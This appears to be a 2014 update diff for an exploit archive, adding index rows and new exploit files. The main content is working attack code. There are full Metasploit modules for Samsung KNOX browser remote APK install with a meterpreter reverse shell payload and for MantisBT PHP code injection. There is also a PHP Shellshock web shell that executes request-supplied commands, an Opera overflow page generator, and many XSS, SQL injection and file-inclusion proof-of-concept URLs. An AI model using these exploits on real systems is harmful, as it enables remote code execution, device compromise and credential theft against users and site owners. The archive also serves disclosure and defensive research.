Updated 11_20_2014

files.csv

@@ -31663,7 +31663,7 @@ id,file,description,date,author,platform,type,port
 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0
 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 Cross Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0
 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
-35146,platforms/php/webapps/35146.txt,"PHP 5.x - Bypass Disable Functions (via Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
+35146,platforms/php/webapps/35146.txt,"PHP 5.x Shellshock Exploit (bypass disable_functions)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
@@ -31767,6 +31767,7 @@ id,file,description,date,author,platform,type,port
 35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
 35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
 35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0
+35273,platforms/windows/remote/35273.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0
 35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80
 35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-17,"BGA Security",xml,webapps,80
 35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,80
@@ -31774,3 +31775,21 @@ id,file,description,date,author,platform,type,port
 35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
 35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0
 35280,platforms/windows/remote/35280.txt,".NET Remoting Services Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0
+35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser RCE",2014-11-18,metasploit,android,remote,0
+35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability",2014-11-18,metasploit,php,remote,80
+35284,platforms/multiple/remote/35284.pl,"Opera Web Browser 11.00 'option' HTML Element Integer Overflow Vulnerability",2011-01-25,"C4SS!0 G0M3S",multiple,remote,0
+35285,platforms/php/webapps/35285.txt,"WordPress Feature Slideshow Plugin 1.0.6 \'src\' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0
+35286,platforms/php/webapps/35286.txt,"WordPress BezahlCode Generator Plugin 1.0 'gen_name' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
+35287,platforms/php/webapps/35287.txt,"Powerhouse Museum Collection Image Grid 0.9.1.1 'tbpv_username' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0
+35288,platforms/php/webapps/35288.txt,"WordPress oQey-Gallery Plugin 0.2 'tbpv_domain' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0
+35289,platforms/php/webapps/35289.txt,"WordPress FCChat Widget Plugin 2.1.7 'path' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
+35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 'guestbook.php' Multiple Cross Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0
+35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 'Target' Parameter Cross Site Scripting Vulnerability",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0
+35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 Multiple Cross Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0
+35293,platforms/php/webapps/35293.txt,"VirtueMart eCommerce Component 1.1.6 for Joomla! SQL Injection Vulnerability",2011-01-31,"Andrea Fabrizi",php,webapps,0
+35294,platforms/php/webapps/35294.txt,"Joomla! 'com_clan_members' Component 'id' Parameter SQL Injection Vulnerability",2011-02-01,FL0RiX,php,webapps,0
+35295,platforms/php/webapps/35295.txt,"Joomla Component 'com_frontenduseraccess' Local File Include Vulnerability",2011-02-01,wishnusakti,php,webapps,0
+35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 'preview' Parameter Cross Site Scripting Vulnerability",2011-01-30,"Avram Marius",php,webapps,0
+35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 'PHPCOVERAGE_HOME' Cross Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0
+35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 Cross Site Scripting and Local File Include Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0
+35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 'id' Parameter Cross Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0

platforms/android/remote/35282.rb

@@ -0,0 +1,162 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'digest/md5'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  # Hash that maps payload ID -> (0|1) if an HTTP request has
+  # been made to download a payload of that ID
+  attr_reader :served_payloads
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                => 'Samsung Galaxy KNOX Android Browser RCE',
+      'Description'         => %q{
+        A vulnerability exists in the KNOX security component of the Samsung Galaxy
+        firmware that allows a remote webpage to install an APK with arbitrary
+        permissions by abusing the 'smdm://' protocol handler registered by the KNOX
+        component.
+
+        The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,
+        and Ace 4.
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              => [
+        'Andre Moulu', # discovery and advisory
+        'joev'   # msf module
+      ],
+      'References'          => [
+        ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'],
+        ['OSVDB', '114590']
+      ],
+      'Platform'            => 'android',
+      'Arch'                => ARCH_DALVIK,
+      'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
+      'Targets'             => [ [ 'Automatic', {} ] ],
+      'DisclosureDate'      => 'Nov 12 2014',
+      'DefaultTarget'       => 0,
+
+      'BrowserRequirements' => {
+        :source     => 'script',
+        :os_name    => OperatingSystems::Match::ANDROID
+      }
+    ))
+
+    register_options([
+      OptString.new('APK_VERSION', [
+        false, "The update version to advertise to the client", "1337"
+      ])
+    ], self.class)
+
+    deregister_options('JsObfuscate')
+  end
+
+  def exploit
+    @served_payloads = Hash.new(0)
+    super
+  end
+
+  def apk_bytes
+    payload.encoded
+  end
+
+  def on_request_uri(cli, req)
+    if req.uri =~ /\/([a-zA-Z0-9]+)\.apk\/latest$/
+      if req.method.upcase == 'HEAD'
+        print_status "Serving metadata..."
+        send_response(cli, '', magic_headers)
+      else
+        print_status "Serving payload '#{$1}'..."
+        @served_payloads[$1] = 1
+        send_response(cli, apk_bytes, magic_headers)
+      end
+    elsif req.uri =~ /_poll/
+      vprint_debug "Polling #{req.qstring['id']}: #{@served_payloads[req.qstring['id']]}"
+      send_response(cli, @served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain')
+    elsif req.uri =~ /launch$/
+      send_response_html(cli, launch_html)
+    else
+      super
+    end
+  end
+
+  # The browser appears to be vulnerable, serve the exploit
+  def on_request_exploit(cli, req, browser)
+    print_status "Serving exploit..."
+    send_response_html(cli, generate_html)
+  end
+
+  def magic_headers
+    { 'Content-Length' => apk_bytes.length,
+      'ETag' => Digest::MD5.hexdigest(apk_bytes),
+      'x-amz-meta-apk-version' => datastore['APK_VERSION'] }
+  end
+
+  def generate_html
+    %Q|
+      <!doctype html>
+      <html><body>
+      <script>
+      #{exploit_js}
+      </script></body></html>
+    |
+  end
+
+  def exploit_js
+    payload_id = rand_word
+
+    js_obfuscate %Q|
+
+      function poll() {
+        var xhr = new XMLHttpRequest();
+        xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999);
+        xhr.onreadystatechange = function(){
+          if (xhr.readyState == 4) {
+            if (xhr.responseText == '1') {
+              setTimeout(killEnrollment, 100);
+            } else {
+              setTimeout(poll, 1000);
+              setTimeout(enroll, 0);
+              setTimeout(enroll, 500);
+            }
+          }
+        };
+        xhr.onerror = function(){
+          setTimeout(poll, 1000);
+          setTimeout(enroll, 0);
+        };
+        xhr.send();
+      }
+
+      function enroll() {
+        var loc = window.location.href.replace(/[/.]$/g, '');
+        top.location = 'smdm://#{rand_word}?update_url='+
+          encodeURIComponent(loc)+'/#{payload_id}.apk';
+      }
+
+      function killEnrollment() {
+        top.location = "intent://#{rand_word}?program="+
+          "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end";
+        setTimeout(launchApp, 300);
+      }
+
+      function launchApp() {
+        top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
+      }
+
+      enroll();
+      setTimeout(poll,600);
+
+    |
+  end
+
+  def rand_word
+    Rex::Text.rand_text_alphanumeric(3+rand(12))
+  end
+end

platforms/multiple/remote/35284.pl

@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/46003/info
+
+Opera Web Browser is prone to a remote integer-overflow vulnerability.
+
+Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions.
+
+Opera 11.00 is vulnerable; other versions may also be affected.
+
+print "[*]Creating the Exploit\n"
+i = 0
+buf = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n"
+ 
+while i<0x4141
+     buf += "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n"
+     i+=1
+end
+ 
+HTML =
+"<html>\n"+
+"<body>\n\n"+
+"<select>\n\n"
+ 
+HTML+=buf * 100
+HTML += "\n\n\n\</select>\n\n"+
+"</body>\n\n\n"+
+"</html>\n\n\n\n\n"
+ 
+f = File.open("Exploit_opera_11.00.html","w")
+f.puts HTML
+f.close
+puts "\n\n\[*]File Created With Sucess"
+sleep(1)
+puts "[*]Go to my Site www.invasao.com.br!"
+sleep(1)

platforms/php/remote/35283.rb

@@ -0,0 +1,290 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability',
+      'Description'    => %q{
+        This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.
+        The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
+        This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Egidio Romano', # discovery http://karmainsecurity.com
+          'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-7146']
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Generic (PHP Payload)', {}]],
+      'DisclosureDate' => 'Nov 8 2014',
+      'DefaultTarget'  => 0))
+
+      register_options(
+      [
+        OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']),
+        OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']),
+        OptString.new('TARGETURI', [ true, 'Base directory path', '/'])
+      ], self.class)
+  end
+
+  def check
+    res = exec_php('phpinfo(); die();', true)
+
+    if res && res.body =~ /This program makes use of the Zend/
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def do_login()
+    print_status('Checking access to MantisBT...')
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
+      'vars_get' => {
+        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
+      }
+    })
+
+    fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && res.code == 200
+
+    session_cookie = res.get_cookies
+
+    print_status('Logging in...')
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'login.php'),
+      'cookie'    => session_cookie,
+      'vars_post' => {
+        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
+        'username' => datastore['username'],
+        'password' => datastore['password'],
+        'secure_session' => 'on'
+      }
+    })
+
+
+    fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
+
+    fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/
+
+    "#{session_cookie} #{res.get_cookies}"
+  end
+
+  def upload_xml(payload_b64, rand_text, cookies, is_check)
+
+    if is_check
+      timeout = 20
+    else
+      timeout = 3
+    end
+
+    rand_num = Rex::Text.rand_text_numeric(1, 9)
+
+    print_status('Checking XmlImportExport plugin...')
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'plugin.php'),
+      'cookie'   => cookies,
+      'vars_get' => {
+        'page' => 'XmlImportExport/import'
+      }
+    })
+
+    unless res && res.code == 200
+      print_error('Error trying to access XmlImportExport/import page...')
+      return false
+    end
+
+    # Retrieving CSRF token
+    if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/
+      csrf_token = Regexp.last_match[1]
+    else
+      print_error('Error trying to read CSRF token')
+      return false
+    end
+
+    # Retrieving default project id
+    if res.body =~ /name="project_id" value="([0-9]+)"/
+      project_id = Regexp.last_match[1]
+    else
+      print_error('Error trying to read project id')
+      return false
+    end
+
+    # Retrieving default category id
+    if res.body =~ /name="defaultcategory">[.|\r|\r\n]*<option value="([0-9])" selected="selected" >\(select\)<\/option><option value="1">\[All Projects\] (.*)<\/option>/
+      category_id = Regexp.last_match[1]
+      category_name = Regexp.last_match[2]
+    else
+      print_error('Error trying to read default category')
+      return false
+    end
+
+    # Retrieving default max file size
+    if res.body =~ /name="max_file_size" value="([0-9]+)"/
+      max_file_size = Regexp.last_match[1]
+    else
+      print_error('Error trying to read default max file size')
+      return false
+    end
+
+    # Retrieving default step
+    if res.body =~ /name="step" value="([0-9]+)"/
+      step = Regexp.last_match[1]
+    else
+      print_error('Error trying to read default step value')
+      return false
+    end
+
+    xml_file =   %Q|
+    <mantis version="1.2.17" urlbase="http://localhost/" issuelink="${eval(base64_decode(#{ payload_b64 }))}}" notelink="~" format="1">
+        <issue>
+            <id>#{ rand_num }</id>
+            <project id="#{ project_id }">#{ rand_text }</project>
+            <reporter id="#{ rand_num }">#{ rand_text }</reporter>
+            <priority id="30">normal</priority>
+            <severity id="50">minor</severity>
+            <reproducibility id="70">have not tried</reproducibility>
+            <status id="#{ rand_num }">new</status>
+            <resolution id="#{ rand_num }">open</resolution>
+            <projection id="#{ rand_num }">none</projection>
+            <category id="#{ category_id }">#{ category_name }</category>
+            <date_submitted>1415492267</date_submitted>
+            <last_updated>1415507582</last_updated>
+            <eta id="#{ rand_num }">none</eta>
+            <view_state id="#{ rand_num }">public</view_state>
+            <summary>#{ rand_text }</summary>
+            <due_date>1</due_date>
+            <description>{${eval(base64_decode(#{ payload_b64 }))}}1</description>
+        </issue>
+    </mantis>
+    |
+
+    data = Rex::MIME::Message.new
+    data.add_part("#{ csrf_token }", nil, nil, "form-data; name=\"plugin_xml_import_action_token\"")
+    data.add_part("#{ project_id }", nil, nil, "form-data; name=\"project_id\"")
+    data.add_part("#{ max_file_size }", nil, nil, "form-data; name=\"max_file_size\"")
+    data.add_part("#{ step }", nil, nil, "form-data; name=\"step\"")
+    data.add_part(xml_file, "text/xml", "UTF-8", "form-data; name=\"file\"; filename=\"#{ rand_text }.xml\"")
+    data.add_part("renumber", nil, nil, "form-data; name=\"strategy\"")
+    data.add_part("link", nil, nil, "form-data; name=\"fallback\"")
+    data.add_part("on", nil, nil, "form-data; name=\"keepcategory\"")
+    data.add_part("#{ category_id }", nil, nil, "form-data; name=\"defaultcategory\"")
+    data_post = data.to_s
+
+    print_status('Sending payload...')
+    return send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),
+      'cookie' => cookies,
+      'ctype'   => "multipart/form-data; boundary=#{ data.bound }",
+      'data'    => data_post
+    }, timeout)
+  end
+
+  def exec_php(php_code, is_check = false)
+
+    # remove comments, line breaks and spaces of php_code
+    payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
+
+    # clean b64 payload
+    while Rex::Text.encode_base64(payload_clean) =~ /=/
+      payload_clean = "#{ payload_clean } "
+    end
+    payload_b64 = Rex::Text.encode_base64(payload_clean)
+
+    rand_text = Rex::Text.rand_text_alpha(5, 8)
+
+    cookies = do_login()
+
+    res_payload = upload_xml(payload_b64, rand_text, cookies, is_check)
+
+    # When a meterpreter session is active, communication with the application is lost.
+    # Must login again in order to recover the communication. Thanks to @FireFart for figure out how to fix it.
+    cookies = do_login()
+
+    print_status("Deleting issue (#{ rand_text })...")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'my_view_page.php'),
+      'cookie' => cookies
+    })
+
+    unless res && res.code == 200
+      print_error('Error trying to access My View page')
+      return false
+    end
+
+    if res.body =~ /title="\[@[0-9]+@\] #{ rand_text }">0+([0-9]+)<\/a>/
+      issue_id = Regexp.last_match[1]
+     else
+      print_error('Error trying to retrieve issue id')
+      return false
+    end
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'bug_actiongroup_page.php'),
+      'cookie'   => cookies,
+      'vars_get' => {
+        'bug_arr[]' => issue_id,
+        'action' => 'DELETE',
+      },
+    })
+
+    if res && res.body =~ /name="bug_actiongroup_DELETE_token" value="(.*)"\/>/
+      csrf_token = Regexp.last_match[1]
+    else
+      print_error('Error trying to retrieve CSRF token')
+      return false
+    end
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'bug_actiongroup.php'),
+      'cookie'   => cookies,
+      'vars_post' => {
+        'bug_actiongroup_DELETE_token' => csrf_token,
+        'bug_arr[]' => issue_id,
+        'action' => 'DELETE',
+      },
+    })
+
+    if res && res.code == 302 || res.body !~ /Issue #{ issue_id } not found/
+      print_status("Issue number (#{ issue_id }) removed")
+    else
+      print_error("Removing issue number (#{ issue_id }) has failed")
+      return false
+    end
+
+    # if check return the response
+    if is_check
+      return res_payload
+    else
+      return true
+    end
+  end
+
+  def exploit
+    unless exec_php(payload.encoded)
+      fail_with(Failure::Unknown, 'Exploit failed, aborting.')
+    end
+  end
+end

platforms/php/webapps/35146.txt

@@ -7,23 +7,19 @@
 # Version: 5.* (tested on 5.6.2)
 # Tested on: Debian 7 and CentOS 5 and 6
 # CVE: CVE-2014-6271
-
+<pre>
+<?php echo "Disabled functions: ".ini_get('disable_functions')."\n"; ?>
 <?php
-function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ 
-mail.c:283
+function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
    if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
      $tmp = tempnam(".","data");
      putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
-     // In Safe Mode, the user may only alter environment variables 
-whose names
+     // In Safe Mode, the user may only alter environment variables whose names
      // begin with the prefixes supplied by this directive.
-     // By default, users will only be able to set environment variables 
-that
-     // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is 
-empty,
+     // By default, users will only be able to set environment variables that
+     // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
      // PHP will let the user modify ANY environment variable!
-     mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually 
-send any mail
+     mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
    }
    else return "Not vuln (not bash)";
    $output = @file_get_contents($tmp);
@@ -31,5 +27,5 @@ send any mail
    if($output != "") return $output;
    else return "No output, or not vuln.";
 }
-shellshock($_REQUEST["cmd"]);
-?>
+echo shellshock($_REQUEST["cmd"]);
+?>

platforms/php/webapps/35285.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46004/info
+
+The Feature Slideshow Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Feature Slideshow Plugin 1.0.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-content/plugins/feature-slideshow/timthumb.php?src=<script>alert(0)</script>

platforms/php/webapps/35286.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46005/info
+
+The BezahlCode Generator Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+BezahlCode Generator Plugin 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/bezahlcode-generator/der_generator.php?gen_name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E 

platforms/php/webapps/35287.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46006/info
+
+The Powerhouse Museum Collection Image Grid Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Powerhouse Museum Collection Image Grid Plugin 0.9.1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/powerhouse-museum-collection-image-grid/shortcode-editor.php?tbpv_id=x&tbpv_username=</script><script>alert(0)</script>&tbpv_domain=&tbpv_login=

platforms/php/webapps/35288.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/46007/info
+
+The oQey-Gallery plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+oQey-Gallery Plugin 0.2 is vulnerable; other versions may also be affected. 
+
+
+http://www.example.com/wordpress/wp-content/plugins/oqey-gallery/bcupload.php?tbpv_id=&tbpv_username=&tbpv_domain=%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E&tbpv_login=

platforms/php/webapps/35289.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46009/info
+
+The FCChat Widget plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FCChat Widget 2.1.7 is vulnerable; other versions may also be affected. 
+
+http://localhost/wordpress/wp-content/plugins/fcchat/js/import.config.php?path=[xss] 

platforms/php/webapps/35290.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/46033/info
+
+SimpGB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SimpGB 1.49.02 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
+
+http://www.example.com/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview
+
+http://www.example.com/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview 

platforms/php/webapps/35291.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46039/info
+
+Vanilla Forums is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Vanilla Forums 2.0.16 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?p=/entry/signin&Target=javascript:alert(document.cookie)//http:// 

platforms/php/webapps/35292.html

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/46068/info
+
+vBSEO is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+vBSEO 3.5.2 and 3.2.2 is vulnerable; other versions may also be affected. 
+
+<html>
+<head>
+<title> [XSS String] </title>
+</head>
+<body>
+<a href="http://www.example.com/01-some-forum-thread.html">SEKSCY INJECT TIEM!</a>
+</body>
+</html>

platforms/php/webapps/35293.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/46070/info
+
+The VirtueMart eCommerce component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+VirtueMart eCommerce 1.1.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?category_id=&page=shop.browse&option=com_virtuemart&Itemid=1&keyword1=hand&search_op=and&keyword2=&search_limiter=anywhere&search=Search&search_category=3
+AND $BLIND_SQL -- 

platforms/php/webapps/35294.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46080/info
+
+The 'com_clan_members' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_clan_members&id=[EXPLOIT] 

platforms/php/webapps/35295.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46081/info
+
+The 'com_frontenduseraccess' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. 
+
+http://www.example.com/index.php?option=com_frontenduseraccess&controller=../../../../../../../../../../proc/self/environ%00 

platforms/php/webapps/35296.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/46082/info
+
+eSyndiCat Directory Software is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+eSyndiCat Directory Software versions 2.2 and 2.3 are vulnerable; other versions may also be affected. 
+
+
+http://www.example.com/?preview="><script>alert('XSS')</script>
+http://www.example.com/?preview="><meta http-equiv="Refresh" content="0;url=http://www.example2.com/"> "" 

platforms/php/webapps/35297.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46085/info
+
+Moodle is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Moodle 2.0.1 are vulnerable. 
+
+http://www.example.com/moodle/lib/spikephpcoverage/src/phpcoverage.remote.top.inc.php?PHPCOVERAGE_HOME=[xss] 

platforms/php/webapps/35298.txt

@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/46086/info
+
